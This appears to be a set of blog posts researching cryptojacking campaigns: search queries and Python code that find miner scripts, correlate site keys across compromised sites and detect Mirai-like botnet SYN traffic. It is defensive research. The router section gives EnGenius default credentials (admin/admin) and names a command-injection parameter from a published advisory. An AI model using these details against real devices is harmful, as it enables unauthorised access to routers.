While PublicWWW can’t search within the deobfuscated JavaScript itself, we can find a way to work around it.

PublicWWW search for sites found in large WordPress cryptojacking campaign.

To search for the affected sites, the following query, graciously crafted for me by VriesHd, was used:

"[\"(k" "\\x43\\x72\\x79\\x70\\x74\\x6f\\x6e\\x69\\x67\\x68\\x74\\x57\\x41\\x53\\x4d\\x57\\x72\\x61\\x70\\x70\\x65\\x72" snipexp:|(var _0x[0-z]{4}=)|

This query searches for the hex-escaped function name used in the obfuscated code (the \x43\x72… sequence decodes to “CryptonightWASMWrapper”) and then uses a regex to extract the obfuscated variable name as a snippet. This is useful for correlating that name, such as “var _0xb70e”, to the Coinhive site key used. Six unique keys were found to be used in this cryptojacking campaign:

Coinhive site key (function name)
DhGEVUgOoquJP68XByYLFs0nRVV4gq4J (0xb70e)
bbgnHTSmMLKUMaQzNa3Yfoul34A3cACd (0xbcba,0xe2f6)
hg9mNsA2DPkqe1F9yCUyWXggnDyrPqVW (0x1b00)
T6Oy0x11TMdeZRjy684Xow4GNBpb07SK (0xf80b)
OQoqVYH65ER2Eg2xcmoVtv4qrcHP2Z7G (0xe4d0,0xb765,0xcc28)
VW8fWIsg9hjn47qBdmb0jImf7pDHmU28 (0x8f35)

In some cases the same Coinhive site key was associated with multiple function names, as shown above.
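To make the deobfuscation step concrete, here is an added Python example (not code from the original post or from any miner project) that decodes the \xNN escapes used by this kind of loader, recovers the _0x… string-array name (the post calls it the function name) that the snipexp regex pulls out, and picks the Coinhive site key out of the decoded strings. The sample loader it runs on is constructed for illustration: its variable name, key and layout are hypothetical, and only the “CryptonightWASMWrapper” marker is the string the query above searches for.

```python
import re

HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")
# The string-array name this obfuscator style emits, e.g. var _0xb70e=[...]
ARRAY_NAME = re.compile(r"var\s+(_0x[0-9a-f]{4,6})\s*=\s*\[")
JS_STRING = re.compile(r'"([^"\\]*)"')
SITE_KEY = re.compile(r"[A-Za-z0-9]{32}")  # Coinhive site keys are 32 chars


def js_hex_escape(text):
    """Encode text as JavaScript \\xNN escapes; only used to build the sample."""
    return "".join("\\x%02x" % ord(c) for c in text)


def decode_hex_escapes(text):
    """Replace every JavaScript \\xNN escape with the character it encodes."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)


def analyze_obfuscated_loader(script):
    """Recover the string-array name, the CryptonightWASMWrapper marker and
    the Coinhive site key from an obfuscated loader like the ones above."""
    decoded = decode_hex_escapes(script)
    name = ARRAY_NAME.search(script)
    strings = JS_STRING.findall(decoded)
    key = next((s for s in strings if SITE_KEY.fullmatch(s)), None)
    return {
        "array_name": name.group(1) if name else None,
        "wasm_wrapper": "CryptonightWASMWrapper" in strings,
        "site_key": key,
    }


# Constructed sample: hypothetical array name and site key, hex-escaped the
# same way the campaign's loaders were.
SAMPLE_KEY = "ExampleSiteKey0123456789abcdefAB"
OBFUSCATED_SAMPLE = (
    'var _0xb70e=["%s","%s","%s","%s"];'
    % tuple(js_hex_escape(s) for s in
            ("CryptonightWASMWrapper", "Anonymous", SAMPLE_KEY, "start"))
    + "var _0x2c1a=function(_0x1,_0x2){return _0xb70e[_0x1-0x0];};"
)

if __name__ == "__main__":
    print(analyze_obfuscated_loader(OBFUSCATED_SAMPLE))
```

Once the array name and key are recovered for each exported result, grouping sites by key gives the same campaign view as the table above.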

Crypto-Loot
Crypto-Loot has steadily remained one of the most popular alternatives to Coinhive since its inception. Similar to Coinhive, Crypto-Loot doesn’t require any user interaction and can run stealthily in the background.

This is a prominent feature on Crypto-Loot’s marketing page, in addition to DDoS protection which is provided by Cloudflare.

Crypto-Loot is advertised to run secretly in the background while protected from DDoS attacks by Cloudflare.

Crypto-Loot uses two domain names for their cryptojacking operations:

These domains can be queried in PublicWWW to locate the affected sites, and, similar to Coinhive, we can use a regex to extract the site key used on each with this query: "CryptoLoot.Anonymous" snipexp:|CryptoLoot.Anonymous\('?(\w{44})'|i

PublicWWW search for "CryptoLoot.Anonymous" snipexp:|CryptoLoot.Anonymous\('?(\w{44})'|i

Searching for strictly the two domains used, we find a total of 2,057 sites with Crypto-Loot present.

CoinImp
CoinImp is a relatively new player in the cryptojacking game; however, the number of sites on which it has been seen has increased sharply of late.

CoinImp uses four domain names for their cryptojacking operations:

Interestingly, the reference to “” previously found in CoinImp’s documentation was quietly removed sometime after 2017-12-20 and replaced with “” as the illustrative example.

Screenshot captured of CoinImp's documentation page on 2017-12-20.

Coincidentally, the most used CoinImp domain name,, has been found by PublicWWW on a whopping 3,745 sites.

PublicWWW search for

Since this was a surprising number, I manually reviewed numerous sites and found that CoinImp had already been removed, or that another form of cryptojacking malware, such as Coinhive, had replaced it. This leads me to believe the campaign perpetrator was using a short-lived method to place the CoinImp code.

Totaling the four CoinImp domain names used, we find a total of 4,119 sites.

Minr
Early in December 2017, I discovered a new form of cryptojacking malware called Minr. What differentiated it from the others is that it provided built-in obfuscation for its users. This wasn’t required, however, and many sites I found didn’t bother to use it.

Example site containing Minr malware
Example of a site containing Minr malware.

In addition, the domain names used by Minr were innocuous looking. The domain names also frequently changed, so anytime I shared an update it quickly became out of date.

Minr malware domains used on 2018-01-29

The domains used by Minr a week ago (shown above) have changed again.

As of this writing, the active domains used by Minr in cryptojacking operations are:

Totaling the four Minr domain names currently used today, we find a total of 692 sites.

deepMiner
Unlike the other cryptojacking providers, deepMiner is self-hosted JavaScript. This means the code used to mine cryptocurrency is not hosted by a third-party service provider and instead placed directly on the website or domain controlled by the cryptojacking campaign operator. The repository of deepMiner’s source code can be found on GitHub.

While this might appear to be a roadblock in our search for sites containing deepMiner, there is still a way to locate it. The trick is to search for the function call deepMiner requires in order to run, shown in the snippet below:

deepMiner code snippet

Now that we have this information, we can simply search PublicWWW for “deepMiner.Anonymous” to locate the affected websites.

PublicWWW search for "deepMiner.Anonymous"

This leads us to find 2,160 sites using deepMiner for cryptojacking purposes.
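The site-key snippet regexes used for Coinhive (CoinHive.Anonymous) and Crypto-Loot (CryptoLoot.Anonymous) earlier in this post, and the deepMiner.Anonymous call here, all serve the same purpose once the search results are exported: pull the key out of each page and group domains by key to spot a single campaign. The following Python is an added example of that correlation step; it is not code from the post or from any of the miner projects. The page bodies are constructed, the domain names are hypothetical, and the deepMiner key length is an assumption since the post does not give one.

```python
import re
from collections import defaultdict

# Snippet regexes from the PublicWWW queries above, with the "." escaped.
# The deepMiner key length is an assumption; the post only names the call.
MINER_KEY_PATTERNS = {
    "Coinhive":    re.compile(r"CoinHive\.Anonymous\(\s*['\"]?(\w{32})['\"]?", re.I),
    "Crypto-Loot": re.compile(r"CryptoLoot\.Anonymous\(\s*['\"]?(\w{44})['\"]?", re.I),
    "deepMiner":   re.compile(r"deepMiner\.Anonymous\(\s*['\"]?(\w{16,64})['\"]?", re.I),
}


def extract_miner_keys(html):
    """Return [(miner, site_key), ...] for every miner constructor in a page."""
    found = []
    for miner, pattern in MINER_KEY_PATTERNS.items():
        for match in pattern.finditer(html):
            found.append((miner, match.group(1)))
    return found


def count_by_miner(pages):
    """Number of domains on which each miner appears (one count per domain)."""
    counts = defaultdict(int)
    for html in pages.values():
        for miner in {m for m, _ in extract_miner_keys(html)}:
            counts[miner] += 1
    return dict(counts)


def correlate_campaigns(pages, min_domains=2):
    """Group domains by (miner, site key). One key shared by many unrelated
    domains is the signature of a single cryptojacking campaign."""
    by_key = defaultdict(set)
    for domain, html in pages.items():
        for miner, key in extract_miner_keys(html):
            by_key[(miner, key)].add(domain)
    return {k: sorted(v) for k, v in by_key.items() if len(v) >= min_domains}


# Constructed page bodies; the domains and keys are hypothetical.
KEY_A, KEY_B, KEY_LOOT, KEY_DEEP = "Ab" * 16, "Cd" * 16, "Ef" * 22, "Gh" * 16
SAMPLE_PAGES = {
    "shop.example.com": '<script src="https://coinhive.com/lib/coinhive.min.js">'
                        "</script><script>var m=new CoinHive.Anonymous('%s');"
                        "m.start();</script>" % KEY_A,
    "blog.example.net": '<script>new CoinHive.Anonymous("%s",'
                        "{throttle:0.3}).start();</script>" % KEY_A,
    "news.example.org": "<script>new CoinHive.Anonymous('%s').start();"
                        "</script>" % KEY_B,
    "loot.example.org": "<script>new CryptoLoot.Anonymous('%s').start();"
                        "</script>" % KEY_LOOT,
    "deep.example.com": "<script>var m=new deepMiner.Anonymous('%s');"
                        "m.start();</script>" % KEY_DEEP,
    "clean.example.com": "<html><body>nothing to see here</body></html>",
}

if __name__ == "__main__":
    print(count_by_miner(SAMPLE_PAGES))
    for (miner, key), domains in correlate_campaigns(SAMPLE_PAGES).items():
        print(miner, key, "->", ", ".join(domains))
```

On real exports, feed each page’s source into extract_miner_keys and keep the per-key domain sets; a key with hundreds of domains behind it is the pattern the earlier Coinhive posts describe.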

One site I found using deepMiner was a fake Chrome update website that advised users not to close the page. Meanwhile cryptojacking was happening in the background consuming 100% CPU of my test machine.

Fake Chrome update website running deepMiner malware
No, Chrome really isn’t updating.

Statistics Comparison

Coinhive remains the market leader for cryptojacking malware. However, many of the clones it inspired are growing rapidly.

Websites found running Crypto-Loot, CoinImp, deepMiner, and Minr malware.

The four Coinhive clones discussed were found on a total of 9,028 websites. CoinImp had the largest share at roughly 45% (4,119 sites), while Minr had the smallest at nearly 8% (692). Crypto-Loot (2,057) and deepMiner (2,160) split the remainder at roughly 23% and 24% respectively.

Websites found running Coinhive and other cryptojacking malware.

However when compared to Coinhive by itself, the other cryptojacking malware providers only account for a modest 18% market share. I would expect Coinhive to remain in the top spot for the foreseeable future.

Closing Remarks

Coinhive is clearly the market leader when it comes to cryptojacking malware as it’s been found on nearly 40,000 websites.

For Chrome users, I recommend using a dedicated extension, minerBlock, to block cryptojacking malware. A Firefox version of this extension is available as well.

The cryptojacking malware discussed in this post is only a portion of what’s currently found in the wild. New variants are discovered frequently, and I share them on Twitter. You can also browse the CoinBlockerLists, constantly updated by ZeroDot1, where you can find hundreds of domains tied to cryptojacking malware.

The statistics shared in this post were generated from data provided by PublicWWW on 2018-02-07. They are subject to change as PublicWWW regularly updates their index.

Cryptojacking: 2017 Year-End Review

In 2017, we witnessed the rise of cryptojacking malware. A common target was compromised websites and their unsuspecting visitors.

How Cryptojacking Works
How cryptojacking works illustration by the European Union Agency for Network and Information Security (ENISA).

Cryptojacking begins after Coinhive or other malicious JavaScript cryptocurrency mining scripts are embedded in a compromised website. Unsuspecting visitors then begin mining the cryptocurrency Monero (XMR) in their browser.

This process is very intensive and can use all the CPU resources of the victim’s device. This leads to higher energy usage, rapid battery drain in mobile devices, and can cause damage from overheating.

Many well-known websites were compromised in 2017 with cryptojacking malware.

Showtime Networks

Coinhive found on Showtime's website
For an entire weekend in September, subscribers of Showtime’s video streaming website, Showtime Anytime, were subjected to cryptojacking.

Back in September, I was the first to document the cryptojacking incident on CBS’ Showtime Networks’ websites. Coinhive malware was found to be present on the video streaming site for three straight days.

Showtime has refused to comment on why the code appeared on their websites. While the Coinhive code was found inside a New Relic code block, New Relic’s spokesman denied any responsibility in the matter.

Politifact
Politifact's website hacked to run Coinhive malware
Hackers embedded Coinhive on Politifact’s website after compromising one of their AWS servers.

On October 13, Coinhive was found on the political fact-checking website Politifact. A compromised JavaScript library was found to be injecting the cryptojacking malware. The malicious code remained on the site for at least four hours before it was removed.

In a statement provided to The Wall Street Journal, PolitiFact Executive Director Aaron Sharockman stated, “Hackers were able to install their script on the fact-checking website after discovering a misconfigured cloud-computing server.”

UFC Fight Pass

UFC Fight Pass hosting Coinhive malware
The cryptojacking of UFC’s Fight Pass website went viral on Reddit as multiple users confirmed the presence of Coinhive.

Early in November, numerous users reported the subscription video streaming service of the UFC, dubbed Fight Pass, was running cryptojacking malware. A customer saved a copy of the source code (above) where Coinhive was found. However, in a statement released to me (below), the UFC denied the code was ever present on their website.

UFC statement regarding cryptojacking allegations

Crucial Memory and Everlast Worldwide

Coinhive found on the website of Crucial Memory

Coinhive on Everlast's website
The cryptojacking of Crucial Memory’s and Everlast’s websites was due to a compromised live help chat widget.

On Thanksgiving Day, I found a large cryptojacking campaign spanning 1,400+ websites. The two most notable sites were those of Crucial Memory and Everlast Worldwide. Normally you would never associate these two brands, however both their websites shared the same embedded code: a live chat widget provided by LiveHelpNow. LiveHelpNow stated one of their CDN servers was compromised and injected with the cryptojacking malware Coinhive.

Globovisión and Movistar

Google Tag Manager was used to inject Coinhive on Globovision's website

Google Tag Manager was used to inject Coinhive on Movistar's website
Google Tag Manager was used to inject Coinhive on Movistar’s and Globovisión’s websites.

In two separate incidents, I found Coinhive was injected into the websites of Globovisión and Movistar using Google Tag Manager. Movistar stated that Coinhive was not put on their website by a hacker, but instead was due to “an internal error” while they were conducting “pre-production tests.” No statement was provided by Globovisión on why the cryptojacking malware appeared on their site on November 15.

Chrome extension “Archive Poster”

Archive Poster Chrome extension infected with cryptojacking malware
Multiple users reported the cryptojacking behavior of the “Archive Poster” extension.

Cryptojacking was not limited to websites in 2017 as we saw Chrome extensions also being affected. One such extension, Archive Poster, remained on the Chrome Web Store for days while silently cryptojacking an unknown portion of their 100,000+ users.

Despite multiple user reports, Google’s response lacked any initiative to remove the malware infected extension. After I reported the issue to them, it was finally pulled.

Other sources of cryptojacking found

Coinhive is not the only JavaScript cryptocurrency miner available for use. Many clones have popped up in its wake. Using PublicWWW, I was able to find how many websites were using a copycat.

JavaScript cryptocurrency miners
Non-Coinhive JavaScript cryptocurrency miners found on 2017-12-24.

One of the up-and-coming Coinhive knockoffs, Minr, offers built-in obfuscation and uses multiple domain names to evade detection.

Domains used by Minr malware change frequently.

Other notable cryptojacking malware discoveries in 2017

— Being found on nearly 2,500 ecommerce websites
— Masquerading as a jQuery file on 4,000 websites
— Concealed with hidden browser window mining
— Even a Starbucks WiFi provider was found running Coinhive

Heading into 2018, the question remains how to stop the spread of cryptojacking malware. Luckily we have seen anti-mining browser extensions, such as No Coin and MinerBlock, developed to help curb the threat. Another popular ad blocker, uBlock Origin, blocks most cryptojacking scripts now as well. Many anti-malware applications, such as Malwarebytes, have started blocking the effects of cryptojacking.

Cryptojacking malware Coinhive found on 30,000+ websites

Since first going mainstream with The Pirate Bay and Showtime, cryptojacking has quickly become a favorite revenue stream for cybercriminals. Cryptojacking typically begins after Coinhive (JavaScript code) is embedded on a compromised website. Unsuspecting visitors then begin mining the cryptocurrency Monero (XMR) in their browser.

How Cryptojacking Works
How cryptojacking works illustration by the European Union Agency for Network and Information Security (ENISA).

The longer the Coinhive script stays on a compromised site, and the more visitors it receives and the longer they stay, the more profitable the cryptojacking session. The operating cost, meanwhile, is nearly zero for the threat actor (hacker) planting the script: the processing burden of Coinhive falls solely on the client (end user). This leads to rapid battery drain and higher energy costs for the afflicted devices.

So how many websites have Coinhive embedded in them? The answer varies depending on the search engine used. To test, I searched for the name of the Coinhive JavaScript library, “coinhive.min.js”, via four search engines: Censys, PublicWWW, Shodan, and ZoomEye. The following numbers of Coinhive sites were found on 2017-11-04:

Censys: 1,640
PublicWWW: 30,611
Shodan: 941
ZoomEye: 474

Since PublicWWW presented the most results, I chose their dataset to analyze. I began cataloging the domain names found by extracting the Coinhive Site Key from each site. Once this was completed, I was able to correlate a single site key to multiple Coinhive infested sites.

NOTE: I also used my own tools to independently verify the PublicWWW results. I felt confident in the data they provided after I had scanned the top 11,000 Coinhive infected sites myself and correlated the results.

The amount of websites tied to one Coinhive Site Key was somewhat astounding. This correlation was also recently noted by security researcher, Willem de Groot. He found 2,496 infected online stores, of which 85% were linked to only two Coinhive accounts.

The most used Coinhive Site Key I found was:

This one key was used on 4,722 sites. Almost all of the sites used the top-level domain “.ir” (ccTLD for Iran). Most of the domain names were four characters long consisting of only random numbers or three characters long consisting of only random words.

Example “numbers only” domains:

Example “letters only” domains:

Example “other” domains:

All domains were registered to a “Mohammad Khezri” of Iran. A reverse WHOIS search on shows 6,040 domains are registered to him. These domains appeared to be parked using a service called DNS4.IR that uses Coinhive to monetize the traffic.

Other individual Coinhive Site Keys were associated to a large amount of domain names. Site keys that were found on 100+ domains are shown below. I sampled the content of a handful of sites found for each key. I also looked for trends in the Nameservers (NS) used for each domain. This allowed me to get a general idea of the “theme” of each Coinhive Site Key used.

Coinhive Site Keys found on 100+ domains organized by total domains associated.

Overall, the bulk of the sites were either compromised websites or parked domains. The third-most used key no longer appeared to be actively engaged in cryptojacking and simply redirected to

The range of compromised sites varied greatly due to the sheer volume. Some notable and humorous sites that I encountered included:

Papa John’s Pizza – Puebla, Mexico

Papa John's Pizza - Puebla, Mexico

National  Association of Doctors

National  Association of Doctors

In addition to Coinhive, a fake online pharmacy was found on their website.

National  Association of Doctors fake online pharmacy

Deposit Insurance of VietNam – Vietnamese equivalent of the FDIC

Vietnamese equivalent of the FDIC, Deposit Insurance of VietNam

Ortel Communications (AS23772) – Large ISP in India

Ortel Communications – “Stay Warm Whenever and Wherever”

While this one is clearly a well-thought-out spoof, cryptojacking is no laughing matter.

A PublicWWW search shows 4,260 WordPress sites are running Coinhive. A “weather widget” plugin was recently banned from the WordPress plugin repository, however other cryptojacking plugins are still available for site operators to utilize.

Various techniques have been used to spread the Coinhive infestation further, from Android apps to an open Amazon S3 bucket of

Coinhive is not the only JavaScript miner available for cryptojacking use. Many competitors have popped up in its wake. Using PublicWWW, I found JSECoin was in a distant second place behind Coinhive on 905 websites.

Non-Coinhive Miners Pie Chart

Non-Coinhive JavaScript cryptocurrency miners found on PublicWWW:
JSEcoin: 905
Crypto-Loot: 123
AFMiner: 77
ProjectPoi (PPoi): 50
Coinhave: 43
Coinerra: 11
MineMyTraffic: 3
Papoto: 1

It’s clear the cryptojacking frenzy will continue into the near future. To protect yourself from cryptocurrency mining scripts while browsing, I recommend using any of the following Chrome extensions:

uBlock Origin

Many anti-malware applications also block cryptojacking scripts, such as Malwarebytes and Avast.

A request has been made to Google Developers to add functionality in Chrome itself to block malicious JavaScript usage. Anyone can comment to share their feedback with Google here.

In the meantime, I will continue to monitor reports of cryptojacking while reviewing new Coinhive sites found daily.

For the latest updates on this topic, follow me on Twitter @bad_packets.

EnGenius routers found in Mirai-like botnet

EnGenius routers were recently found in a Mirai-like botnet with a distinct network traffic fingerprint. Locating this botnet subset was a joint effort between myself and Dr. Neal Krawetz.

EnGenius logo

This Mirai-like botnet traffic was fingerprinted after a distinct pattern in the packets received was identified by Dr. Krawetz. While the source port was usually randomized, the TCP sequence number was always the same. However, it wasn’t just any static number, it was the destination IP address of the bot’s target.

This behavior was previously noted in a LinkedIn post about IDS rules used to block Mirai scans. It is expected, per the snippet of Mirai source code shown below.

Snippet of Mirai source code

I found 85,100 unique IP addresses used by devices in Mirai-like botnet since 2/18/2017. AS4134 (China Telecom) had most unique IPs with 10,972 seen.

IP addresses seen in Mirai-like botnet by ASN since 2017-02-18

This destination IP address was found to be encoded in each incoming packet’s sequence number. The example log snippet below illustrates how it is extracted.


In this case the TCP sequence number, written as hex, is 0x48c1af41. When we convert this value from hex to an IP address, we get – which is the destination (target) IP address.

Your logs may vary and instead record the sequence number in decimal format. In the example above, the decimal version of the SEQ = 1220652865 which converts to just the same.

The fingerprint is best illustrated when the target IP address changes as shown below:

TCP Sequence Number = Destination IP

Once the fingerprint of the botnet was established, I was able to review the IP addresses found in my logs for further patterns. After reviewing a handful of devices coming from IP addresses in the United States, I noticed a trend in the type of device: each was an EnGenius ESR300 or ESR600 router.

EnGenius ESR300 router

Both router models are listed on the EnGenius website as a “Discontinued Product” and the latest firmware was released on 5/23/2016.

EnGenius Firmware Screenshot

Combining the botnet data from Dr. Krawetz, I independently confirmed 81 of 130 EnGenius routers known to be participating in the botnet.

All incoming traffic from the EnGenius routers was on TCP port 23/2323 (telnet). The highest-volume attackers are shown below and the raw data is available here.

EnGenius Botnet - Top Attackers

The majority of the attacks occurred between 8/25/2017 and 8/29/2017. The type of attack was a SYN flood. The first network traffic from an EnGenius router was observed on 6/15/2017. The raw data of all traffic I observed is available here.

Attacks from EnGenius routers came from all over the world, though most came from networks in the United States. AS11796 (Airstream Communications) and AS13370 (LocalTel Communications) tied for the most, each with 12 unique IP addresses in the EnGenius router botnet.

EnGenius Routers found by ASN with more than one unique IP address

The majority of EnGenius routers found had the same ports open to the internet:

UDP 5060 (SIP)
TCP 8081 (HTTP)
TCP 9000 (HTTP)
TCP 10000 (HTTP)

So how easy is it for the average user to access the administrator interface of these routers? Not surprisingly, very easy. The router’s default credentials are quickly found in the user manual.

EnGenius default credentials

But what if you want to take a more “challenging” approach to locating the default creds? Look no further than the JavaScript file loaded when you visit the router’s login page:

Locating the EnGenius default credentials

This file describes all the functions of the router in addition to providing the default credentials:

“Please enter user name and password.”
“The default account is admin/admin.”

If you’re looking for an even more challenging method to gain access to an EnGenius router, a remote code execution exploit PoC was published by Zero Science Lab earlier this year, in which they stated:

EnGenius EnShare suffers from an unauthenticated command injection vulnerability. An attacker can inject and execute arbitrary code as the root user via the ‘path’ GET/POST parameter parsed by ‘usbinteract.cgi’ script.

I was able to confirm this method was viable for some, but not all of the EnGenius routers found in the botnet. Since it’s very easy to gain root access to EnGenius routers, it presents a clear avenue for any malicious party to add them to their botnet.

I contacted EnGenius with my findings and their customer service team replied that my case “has been escalated to the engineering team.” I haven’t received further communication from EnGenius and will update this post if I hear back.

In the meantime, Dr. Krawetz advises:

For network administrators who want to detect infected hosts from this new botnet: Look for SYN packets where tcp.seq==ip.dst.

If you see a match, then the ip.src denotes an infected address. Either the device at that address is infected, or something behind that NAT router is infected.
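The fingerprint described earlier in this post (a SYN whose raw TCP sequence number equals its own destination address) and Dr. Krawetz’s tcp.seq==ip.dst advice apply to firewall logs just as well as to packet captures. Below is an added Python example, not code from the post, that reads iptables-style log lines (the SEQ= field requires the LOG target’s --log-tcp-sequence option), reinterprets the 32-bit sequence number as a dotted IPv4 address and reports source addresses whose pure SYNs match their target. The log lines are constructed for illustration with documentation-range addresses; nothing in them is real traffic.

```python
import ipaddress
import re

FIELD = re.compile(r"\b(SRC|DST|SEQ)=(\S+)")
# TCP flag names as iptables prints them; "ACK=0" and "URGP=0" are fields,
# not flags, so a flag must not be followed by "=" or a word character.
FLAG = re.compile(r"(?<![\w=])(URG|ACK|PSH|RST|SYN|FIN)(?![\w=])")


def seq_to_ip(seq):
    """Reinterpret a 32-bit TCP sequence number as a dotted IPv4 address,
    the byte order in which the scanner copies the target into the SYN."""
    return str(ipaddress.IPv4Address(seq & 0xFFFFFFFF))


def parse_seq(value):
    """Accept SEQ= values in decimal (iptables) or 0x-prefixed hex."""
    return int(value, 16) if value.lower().startswith("0x") else int(value)


def find_mirai_fingerprint(log_lines):
    """Return (src, dst) for every pure SYN whose raw seq equals its dst IP.
    Each src is an infected device, or something behind that NAT router."""
    hits = []
    for line in log_lines:
        if "PROTO=TCP" not in line:
            continue
        flags = set(FLAG.findall(line))
        if "SYN" not in flags or "ACK" in flags:  # skip SYN-ACK and data
            continue
        fields = dict(FIELD.findall(line))
        if not {"SRC", "DST", "SEQ"} <= fields.keys():
            continue
        if seq_to_ip(parse_seq(fields["SEQ"])) == fields["DST"]:
            hits.append((fields["SRC"], fields["DST"]))
    return hits


# Constructed iptables log lines (documentation-range addresses, not real traffic).
SAMPLE_LOG = [
    # seq 3405803781 == 0xcb007105 == 203.0.113.5: the infected scanner
    "Jun 15 02:11:43 honeypot kernel: IN=eth0 OUT= SRC=198.51.100.23 DST=203.0.113.5 "
    "LEN=40 TOS=0x00 PREC=0x00 TTL=52 ID=0 DF PROTO=TCP SPT=4431 DPT=23 "
    "SEQ=3405803781 ACK=0 WINDOW=14600 RES=0x00 SYN URGP=0",
    # ordinary SYN with a random sequence number: not flagged
    "Jun 15 02:11:44 honeypot kernel: IN=eth0 OUT= SRC=192.0.2.44 DST=203.0.113.5 "
    "LEN=60 TOS=0x00 PREC=0x00 TTL=61 ID=31337 DF PROTO=TCP SPT=53120 DPT=23 "
    "SEQ=1693421770 ACK=0 WINDOW=29200 RES=0x00 SYN URGP=0",
    # same fingerprint against a second target, seq logged in hex
    "Jun 15 02:12:01 honeypot kernel: IN=eth0 OUT= SRC=198.51.100.77 DST=203.0.113.9 "
    "LEN=40 TOS=0x00 PREC=0x00 TTL=48 ID=0 DF PROTO=TCP SPT=9090 DPT=2323 "
    "SEQ=0xcb007109 ACK=0 WINDOW=14600 RES=0x00 SYN URGP=0",
    # matching seq but not a SYN: ignored, the rule is for SYN packets only
    "Jun 15 02:12:05 honeypot kernel: IN=eth0 OUT= SRC=198.51.100.23 DST=203.0.113.5 "
    "LEN=52 TOS=0x00 PREC=0x00 TTL=52 ID=7 DF PROTO=TCP SPT=4431 DPT=23 "
    "SEQ=3405803781 ACK=88210 WINDOW=14600 RES=0x00 ACK PSH URGP=0",
]

if __name__ == "__main__":
    for src, dst in find_mirai_fingerprint(SAMPLE_LOG):
        print("infected host or NAT: %s (scanning %s)" % (src, dst))
```

If you run the same check in Wireshark, remember that it shows relative sequence numbers by default (a SYN’s seq appears as 0); disable “Relative sequence numbers” in the TCP protocol preferences, or use the tcp.seq_raw field in newer releases, so the comparison sees the raw value. As the quote above notes, a hit identifies the packet’s source, which may be the router itself or a device behind its NAT.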